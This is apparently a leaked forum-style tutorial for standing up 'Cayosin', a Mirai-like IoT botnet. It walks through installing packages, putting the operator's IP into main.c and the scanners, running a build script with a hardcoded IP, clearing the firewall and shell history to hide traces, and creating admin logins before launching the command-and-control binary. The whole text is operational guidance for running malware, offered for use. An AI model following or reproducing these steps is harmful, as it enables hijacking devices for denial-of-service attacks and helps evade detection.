This leaked by Woah.#9522 

Basicly this source is like a mirai so do this first

yum update -y; yum install wget python gcc nano screen httpd php -y; service httpd start; ulimit -n 999999

thats just basic updating

Now in the main.c u want to change the ip looks like this
int hacks[] = {1};//1.2.3.4
int hacks2[] = {2};
int hacks3[] = {3};
int hacks4[] = {4}; 
int hakai_bp = 4554;

You need to change the 1.2.3.4 to your IP, so, say for example your IP is 176.45.24.78, it should now look like this

int hacks[] = {176};//176.45.24.78
int hacks2[] = {45};
int hacks3[] = {24};
int hacks4[] = {78}; 
int hakai_bp = 4554;

then u wan't to change the ip in all the scanners also

Then run this

python Cayosin.py fff 209.97.168.189 cayosin; rm -rf bot; mv iplookup.php /var/www/html


                      ^^^^^^^^^^^^ Change the ip                                        



Now U Want To Run This

iptables -F; service iptables stop; rm -rf Cayosin.py; history -c; rm -rf cross-compiler-armv4l cross-compiler-armv5l cross-compiler-armv6l cross-compiler-armv7l cross-compiler-i586 cross-compiler-i686 cross-compiler-m68k cross-compiler-mips cross-compiler-mipsel cross-compiler-powerpc cross-compiler-powerpc-440fp cross-compiler-sh4 cross-compiler-sparc cross-compiler-x86_64


After that  run this

nano /usr/include/bits/typesizes.h

go all the way down change the 1024 to 999999 then do CTRL + X then press y and enter

Thats all for That Now Its Logins

Basicly the is a new retarted system its database and tokens i have no idea how this works just look at the logins that are in their and go off that

This has to be there first 
Admin Ad667 1 99/99/9999 -1 -1 -1 

so if i wanted a admin login i would do this

USERNAME PASSWORD 1 32/12/9999 5000 9999 0

U Figure Out The Tokens BS 

now this is precompiled so do this to screen it

screen ./c2 740 4554 
       ^^^^^^^^^^^^^
Don't change any of This

Now Don't Say Yall Made This Tutorial You Skiddys

Love U Guys Bye